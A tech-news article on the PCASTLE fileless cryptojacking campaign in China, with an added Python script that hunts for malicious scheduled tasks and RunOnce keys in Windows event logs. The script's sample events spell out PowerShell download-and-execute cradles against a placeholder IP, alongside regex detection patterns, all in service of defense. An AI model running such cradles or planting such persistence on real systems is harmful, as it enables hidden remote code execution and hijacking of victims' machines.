Cryptojacking campaign strikes China with fileless attacks

Mining for Monero is the campaign’s ultimate goal.
Written by Charlie Osborne, Contributing Writer

A spike in attacks in China has revealed a renewed cryptojacking campaign that uses fileless techniques to hijack victims' processing power and mine Monero.

Trend Micro researchers said on Wednesday that the campaign, dubbed PCASTLE, is ongoing; activity so far peaked on May 22. In total, 92 percent of infections are in China, and the operators behind PCASTLE do not appear to be targeting particular industries or victims.

"The campaign's operators also do not seem to care who gets affected, as long as they get infected," the researchers say.

PCASTLE uses several propagation methods to maximize its chances of infection: exploiting EternalBlue, the exploit for a flaw in Microsoft Windows' SMBv1 implementation; brute-forcing credentials; and "pass the hash", in which an attacker authenticates to other Windows hosts with a stolen NTLM password hash directly, without having to crack it to recover the plaintext password.

If any of these methods succeeds, either a scheduled task or a RunOnce registry key is created to download and run the campaign's first payload, a malicious PowerShell script.

This script downloads further payloads and executes them in memory only. Because the later stages never touch disk, this fileless approach leaves traditional file-scanning antivirus products with little to inspect, making the malware harder to detect.

The PowerShell script also attempts to reach a list of URLs hardcoded in the script, creates scheduled tasks that fire hourly to maintain persistence, and downloads another script that handles communication with the operator's command-and-control (C2) server.


The hardcoded URLs point to the C2 server and to the host serving the cryptocurrency-mining script.

Information about the victim system, including the PC name, MAC address, operating system and timestamps, is then sent to the attacker's C2. Another PowerShell script is downloaded, and it executes a cryptocurrency mining module matching the victim PC's architecture.

XMRig is the miner of choice, and the cryptocurrency mined is Monero (XMR).
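
The infection chain above leaves a recognizable footprint in Windows telemetry: a scheduled task or RunOnce value whose action is PowerShell with a download cradle, followed by PowerShell processes launched with in-memory execution flags. The following is an added hunting example written for this article, not Trend Micro's code or anything recovered from the PCASTLE sample. It runs in Python over a constructed list of records shaped like Security event 4698 (scheduled task created), Sysmon event 13 (registry value set) and Sysmon event 1 (process create); the indicator strings are generic fileless-PowerShell tradecraft chosen as assumptions, and the task names, registry paths, IP address and encoded string in the sample data are all made up.

```python
"""Flag fileless PowerShell persistence in exported Windows event records.

Added example for this article; not Trend Micro's code and not derived from the
PCASTLE sample. Indicator patterns are assumptions based on generic download-
cradle tradecraft, and all sample events below are constructed.
"""
import re

# Indicator groups for a PowerShell download cradle / in-memory execution.
CRADLE_PATTERNS = {
    "webclient": re.compile(r"(?i)Net\.WebClient|DownloadString|DownloadData"),
    "web_cmdlet": re.compile(r"(?i)Invoke-WebRequest|Invoke-RestMethod|\biwr\b"),
    "iex": re.compile(r"(?i)\bIEX\b|Invoke-Expression"),
    "encoded": re.compile(r"(?i)-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"),
    "hidden": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "no_profile": re.compile(r"(?i)-nop\b|-noprofile|-ep\s+bypass|-ExecutionPolicy\s+bypass"),
}
POWERSHELL_RE = re.compile(r"(?i)\bpowershell(?:\.exe)?\b|\bpwsh(?:\.exe)?\b")
RUNONCE_RE = re.compile(r"(?i)\\CurrentVersion\\RunOnce\\")
HOURLY_RE = re.compile(r"<Interval>PT1H</Interval>")  # task XML: repeat every hour


def cradle_hits(text):
    """Names of the indicator groups present in a command line or task body."""
    return sorted(name for name, pat in CRADLE_PATTERNS.items() if pat.search(text))


def classify(event):
    """Return an alert dict for one event, or None if it looks benign."""
    eid = event["EventID"]
    if eid == 4698:  # Security: scheduled task created; TaskContent holds the task XML
        body = event.get("TaskContent", "")
        if POWERSHELL_RE.search(body):
            hits = cradle_hits(body)
            if hits:
                if HOURLY_RE.search(body):
                    hits.append("hourly_trigger")
                return {"technique": "scheduled_task", "key": event.get("TaskName", ""), "hits": hits}
    elif eid == 13:  # Sysmon: registry value set; only RunOnce autostart values matter here
        target = event.get("TargetObject", "")
        value = event.get("Details", "")
        if RUNONCE_RE.search(target) and POWERSHELL_RE.search(value) and cradle_hits(value):
            return {"technique": "runonce_key", "key": target, "hits": cradle_hits(value)}
    elif eid == 1:  # Sysmon: process create; require two indicators to cut noise
        cmd = event.get("CommandLine", "")
        if POWERSHELL_RE.search(cmd):
            hits = cradle_hits(cmd)
            if len(hits) >= 2:
                return {"technique": "powershell_cradle", "key": cmd[:60], "hits": hits}
    return None


def scan(events):
    """Alerts for every event in the list that matches one of the three patterns."""
    return [alert for alert in (classify(e) for e in events) if alert]


# Constructed sample events (198.51.100.7 is a documentation address, the -enc
# blob is filler, and the task/registry names are invented).
SAMPLE_EVENTS = [
    {"EventID": 4698, "TaskName": "\\Updater", "TaskContent":
        '<Task><Triggers><TimeTrigger><Repetition><Interval>PT1H</Interval></Repetition>'
        '</TimeTrigger></Triggers><Actions><Exec><Command>powershell.exe</Command>'
        "<Arguments>-nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s1.ps1')\"</Arguments>"
        '</Exec></Actions></Task>'},
    {"EventID": 13, "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\svc",
     "Details": "powershell -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s1.ps1')\""},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc QQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEAQQBBAEEA"},
    {"EventID": 4698, "TaskName": "\\Backup", "TaskContent":
        "<Task><Actions><Exec><Command>C:\\Tools\\backup.exe</Command><Arguments>/full</Arguments></Exec></Actions></Task>"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
    {"EventID": 13, "TargetObject": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive",
     "Details": "C:\\Users\\x\\OneDrive.exe /background"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["technique"], alert["key"], alert["hits"])
```

The three malicious records are flagged and the three benign ones (a non-PowerShell task, a plain `-File` invocation, and a Run key pointing at an executable) are not. Process-create events require two indicator groups because a single flag such as `-w hidden` is common in legitimate administration scripts, whereas any cradle indicator inside a scheduled task or RunOnce value is worth a look on its own.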

"Algorithms for Monero mining are not as resource-intensive compared to other miners, and don't require a lot of processing power," Trend Micro says. "This means they can illicitly mine the cryptocurrency without alerting users unless they notice certain red flags like performance issues."


Unlike ransomware, which pays only if the victim decides to pay, cryptocurrency mining yields a small but near-certain return on every infection. Over the past few weeks other major cryptojacking campaigns have been uncovered, including the Nansh0u campaign, which infected some 50,000 MS-SQL and phpMyAdmin servers with cryptocurrency miners, and a new malware family, BlackSquid, which also deploys XMRig.


"The attackers' motivations for concentrating their activities back on China-based systems are unclear," the researchers added. "Nonetheless, this campaign showed that fileless threats aren't going away. In fact, we project that fileless techniques will be among the most prevalent threats used in the current landscape." 
